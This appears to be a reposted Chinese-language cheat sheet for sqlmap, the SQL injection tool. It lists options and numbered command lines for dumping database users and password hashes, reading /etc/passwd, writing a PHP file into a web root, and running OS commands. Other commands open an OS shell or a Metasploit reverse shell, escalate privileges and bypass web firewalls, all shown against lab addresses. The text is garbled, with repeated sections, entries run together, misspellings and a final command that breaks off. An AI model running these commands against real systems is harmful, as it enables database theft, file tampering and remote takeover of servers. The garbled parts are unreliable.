sqlmap工具知识点
--threads #采用多线程(--threads 3)
--sql-shell #执行指定sql命令
--sql-query #执行指定的sql语句(--sql-query "SELECT password FROM mysql.use
|
--string="" #指定关键词,字符串匹配. --threads #采用多线程(--threads 3) --sql-shell #执行指定sql命令 --sql-query #执行指定的sql语句(--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" ) --file-read #读取指定文件 --file-write #写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt) --file-dest #要写入的文件绝对路径 --os-cmd=id #执行系统命令 --os-shell #系统交互shell --os-pwn #反弹shell(--os-pwn --msf-path=/opt/framework/msf3/) --msf-path= #matesploit绝对路径(--msf-path=/opt/framework/msf3/) --os-smbrelay # --os-bof # --reg-read #读取win系统注册表 --priv-esc # --time-sec= #延迟设置 默认--time-sec=5 为5秒 -p "user-agent" --user-agent "sqlmap/0.7rc1 ()" #指定user-agent注入 --eta #盲注 /pentest/database/sqlmap/txt/ common-columns.txt字段字典 common-outputs.txt common-tables.txt 表字典 keywords.txt oracle-default-passwords.txt user-agents.txt wordlist.txt 常用语句 : /sqlmap.py -u -f -b --current-user --current-db --users --passwords --dbs -v 0 /sqlmap.py -u -b --passwords -U root --union-use -v 2 /sqlmap.py -u -b --dump -T users -C username -D userdb --start 2 --stop 3 -v 2 /sqlmap.py -u -b --dump -C "user,pass" -v 1 --exclude-sysdbs /sqlmap.py -u -b --sql-shell -v 6./sqlmap.py -u -b --file-read "c:\boot.ini" -v 2 7./sqlmap.py -u -b --file-write /test/test.txt --file-dest /var/www/html/1.txt -v 2 8./sqlmap.py -u -b --os-cmd "id" -v 1 9./sqlmap.py -u -b --os-shell --union-use -v 2 10./sqlmap.py -u -b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc -v 1 11./sqlmap.py -u -b --os-pwn --msf-path=/opt/framework/msf3 -v 1 12./sqlmap.py -u -b --os-bof --msf-path=/opt/framework/msf3 -v 1 13./sqlmap.py -u --reg-add --reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1 14./sqlmap.py -u -b --eta 15./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc" 16./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" 17./sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)" 18./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3 19./sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1 20./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner 21./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low" --string='xx' --dbs --level=3 -p "uid" 简单的注入流程 : 读取数据库版本,当前用户mssql注入,当前数据库 sqlmap -u -f -b --current-user --current-db -v 1 判断当前数据库用户权限 sqlmap -u --privileges -U 用户名 -v 1 sqlmap -u --is-dba -U 用户名 -v 1 读取所有数据库用户或指定数据库用户的密码 sqlmap -u --users --passwords -v 2 sqlmap -u --passwords -U root -v 2 获取所有数据库 sqlmap -u --dbs -v 2 获取指定数据库中的所有表 sqlmap -u --tables -D mysql -v 2 获取指定数据库名中指定表的字段 sqlmap -u --columns -D mysql -T users -v 2 获取指定数据库名中指定表中指定字段的数据 sqlmap -u --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2 file-read读取web文件 sqlmap -u --file-read "/etc/passwd" -v 2 9.file-write写入文件到web sqlmap -u --file-write /localhost/mm.php --file使用sqlmap绕过防火墙进行注入测试: (编辑:源码门户网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
